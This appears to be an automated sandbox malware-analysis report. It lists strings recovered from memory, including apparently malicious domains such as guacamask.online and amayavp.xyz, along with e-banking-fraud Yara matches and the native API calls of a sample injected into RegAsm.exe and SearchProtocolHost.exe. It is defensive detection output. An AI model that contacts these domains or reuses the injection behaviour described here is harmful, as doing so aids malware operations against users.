                Source: SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000535C000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000040FC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.614genetics.online/sk-logabpstatus.php?a=WnBLNjkrbVlldHVINmphNWlCc0VwNzM2dk40eEMzS2RMZnFB
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Guacamask.online
                Source: zfEzkYXCOLr.exe, 00000007.00000002.3778720033.0000000004ECD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz
                Source: zfEzkYXCOLr.exe, 00000007.00000002.3778720033.0000000004ECD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.amayavp.xyz/dcdf/
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guacamask.online/Guacamask_Online_Banking.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBG
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guacamask.online/Guacamask_Online_Booking.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBG
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guacamask.online/Guacamask_Online_Gratis.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGu
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guacamask.online/Guacamask_Online_Sa_Prevodom.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2B
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guacamask.online/Guacamask_Online_Store.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuB
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guacamask.online/__media__/design/underconstructionnotice.php?d=guacamask.online
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guacamask.online/__media__/js/trademark.php?d=guacamask.online&type=ns
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.guacamask.online/display.cfm
                Source: zfEzkYXCOLr.exe, 00000007.00000002.3776346635.0000000003922000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.seeseye.website/37ym/?KV=8/t/mdNf2RQMOaNBNJ0C2CHQCZtSfGEsPKxsb92U4gy0IzojrjG5dpGxrabMefB
                Source: SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.00000000049F0000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.0000000003790000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3777602378.00000000046CC000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.000000000346C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: SearchProtocolHost.exe, 00000006.00000002.3768386614.00000000030DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: SearchProtocolHost.exe, 00000006.00000002.3768386614.00000000030B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: SearchProtocolHost.exe, 00000006.00000003.1755924763.0000000007F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: SearchProtocolHost.exe, 00000006.00000002.3768386614.00000000030DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_de
                Source: SearchProtocolHost.exe, 00000006.00000002.3768386614.00000000030DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: SearchProtocolHost.exe, 00000006.00000002.3768386614.00000000030DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: SearchProtocolHost.exe, 00000006.00000002.3768386614.00000000030B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LI
                Source: SearchProtocolHost.exe, 00000006.00000002.3768386614.00000000030DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: SearchProtocolHost.exe, 00000006.00000002.3768386614.00000000030B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033PI
                Source: SearchProtocolHost.exe, 00000006.00000002.3768386614.00000000030B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033tI
                Source: SearchProtocolHost.exe, 00000006.00000002.3768386614.00000000030DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033y
                Source: SearchProtocolHost.exe, 00000006.00000002.3768386614.00000000030DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: SearchProtocolHost.exe, 00000006.00000002.3768386614.00000000030DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: SearchProtocolHost.exe, 00000006.00000002.3768386614.00000000030B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.0000000004216000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.0000000002FB6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
                Source: SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.0000000004D14000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.0000000003AB4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: SearchProtocolHost.exe, 00000006.00000002.3777602378.00000000051CA000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.0000000003F6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hostgator.com.br

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3775770307.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3766152449.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3778720033.0000000004E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3775867961.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3776047810.0000000005420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1575092395.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1575820816.0000000006400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: temp_u8gpg.exe.0.dr, R-7qnKyuM-zCezj-AWZH-piI-.csLong String: Length: 387084
                Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042CE33 NtClose,3_2_0042CE33
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F235C0 NtCreateMutant,LdrInitializeThunk,3_2_02F235C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22B60 NtClose,LdrInitializeThunk,3_2_02F22B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_02F22C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_02F22DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F24340 NtSetContextThread,3_2_02F24340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F23090 NtSetValueKey,3_2_02F23090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F23010 NtOpenDirectoryObject,3_2_02F23010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F24650 NtSuspendThread,3_2_02F24650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22AF0 NtWriteFile,3_2_02F22AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22AD0 NtReadFile,3_2_02F22AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22AB0 NtWaitForSingleObject,3_2_02F22AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22BF0 NtAllocateVirtualMemory,3_2_02F22BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22BE0 NtQueryValueKey,3_2_02F22BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22BA0 NtEnumerateValueKey,3_2_02F22BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22B80 NtQueryInformationFile,3_2_02F22B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F239B0 NtGetContextThread,3_2_02F239B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22EE0 NtQueueApcThread,3_2_02F22EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22EA0 NtAdjustPrivilegesToken,3_2_02F22EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22E80 NtReadVirtualMemory,3_2_02F22E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22E30 NtWriteVirtualMemory,3_2_02F22E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22FE0 NtCreateFile,3_2_02F22FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22FB0 NtResumeThread,3_2_02F22FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22FA0 NtQuerySection,3_2_02F22FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22F90 NtProtectVirtualMemory,3_2_02F22F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22F60 NtCreateProcessEx,3_2_02F22F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22F30 NtCreateSection,3_2_02F22F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22CF0 NtOpenProcess,3_2_02F22CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22CC0 NtQueryVirtualMemory,3_2_02F22CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22CA0 NtQueryInformationToken,3_2_02F22CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22C60 NtCreateKey,3_2_02F22C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22C00 NtQueryInformationProcess,3_2_02F22C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22DD0 NtDelayExecution,3_2_02F22DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22DB0 NtEnumerateKey,3_2_02F22DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F23D70 NtOpenThread,3_2_02F23D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22D30 NtUnmapViewOfSection,3_2_02F22D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22D10 NtMapViewOfSection,3_2_02F22D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F23D10 NtOpenProcessToken,3_2_02F23D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F22D00 NtSetInformationFile,3_2_02F22D00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E4340 NtSetContextThread,LdrInitializeThunk,6_2_036E4340
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E4650 NtSuspendThread,LdrInitializeThunk,6_2_036E4650
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E35C0 NtCreateMutant,LdrInitializeThunk,6_2_036E35C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2B60 NtClose,LdrInitializeThunk,6_2_036E2B60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_036E2BE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_036E2BF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_036E2BA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2AF0 NtWriteFile,LdrInitializeThunk,6_2_036E2AF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2AD0 NtReadFile,LdrInitializeThunk,6_2_036E2AD0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E39B0 NtGetContextThread,LdrInitializeThunk,6_2_036E39B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2F30 NtCreateSection,LdrInitializeThunk,6_2_036E2F30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2FE0 NtCreateFile,LdrInitializeThunk,6_2_036E2FE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2FB0 NtResumeThread,LdrInitializeThunk,6_2_036E2FB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_036E2EE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_036E2E80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_036E2D30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_036E2D10
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_036E2DF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2DD0 NtDelayExecution,LdrInitializeThunk,6_2_036E2DD0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2C60 NtCreateKey,LdrInitializeThunk,6_2_036E2C60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_036E2C70
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_036E2CA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E3010 NtOpenDirectoryObject,6_2_036E3010
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E3090 NtSetValueKey,6_2_036E3090
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2B80 NtQueryInformationFile,6_2_036E2B80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2AB0 NtWaitForSingleObject,6_2_036E2AB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2F60 NtCreateProcessEx,6_2_036E2F60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2FA0 NtQuerySection,6_2_036E2FA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2F90 NtProtectVirtualMemory,6_2_036E2F90
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2E30 NtWriteVirtualMemory,6_2_036E2E30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2EA0 NtAdjustPrivilegesToken,6_2_036E2EA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E3D70 NtOpenThread,6_2_036E3D70
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2D00 NtSetInformationFile,6_2_036E2D00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E3D10 NtOpenProcessToken,6_2_036E3D10
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2DB0 NtEnumerateKey,6_2_036E2DB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2C00 NtQueryInformationProcess,6_2_036E2C00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2CF0 NtOpenProcess,6_2_036E2CF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_036E2CC0 NtQueryVirtualMemory,6_2_036E2CC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E596C0 NtCreateFile,6_2_02E596C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E59B10 NtAllocateVirtualMemory,6_2_02E59B10
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E59820 NtReadFile,6_2_02E59820
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E599B0 NtClose,6_2_02E599B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02E59910 NtDeleteFile,6_2_02E59910
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_0346F899 NtMapViewOfSection,6_2_0346F899
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00418DC33_2_00418DC3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040E8103_2_0040E810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040E8133_2_0040E813
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004108333_2_00410833
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040E9573_2_0040E957
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040E9633_2_0040E963
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040290C3_2_0040290C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004029103_2_00402910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004032003_2_00403200
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042F4433_2_0042F443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004026403_2_00402640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004106133_2_00410613
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004026333_2_00402633
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416F7D3_2_00416F7D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416FC33_2_00416FC3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00416FBE3_2_00416FBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F912ED3_2_02F912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F0B2C03_2_02F0B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF52A03_2_02EF52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F902743_2_02F90274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FB03E63_2_02FB03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EFE3F03_2_02EFE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02F3739A3_2_02F3739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EDD34C3_2_02EDD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAA3523_2_02FAA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA132D3_2_02FA132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FA70E93_2_02FA70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02FAF0E03_2_02FAF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02EF70C03_2_02EF70C0
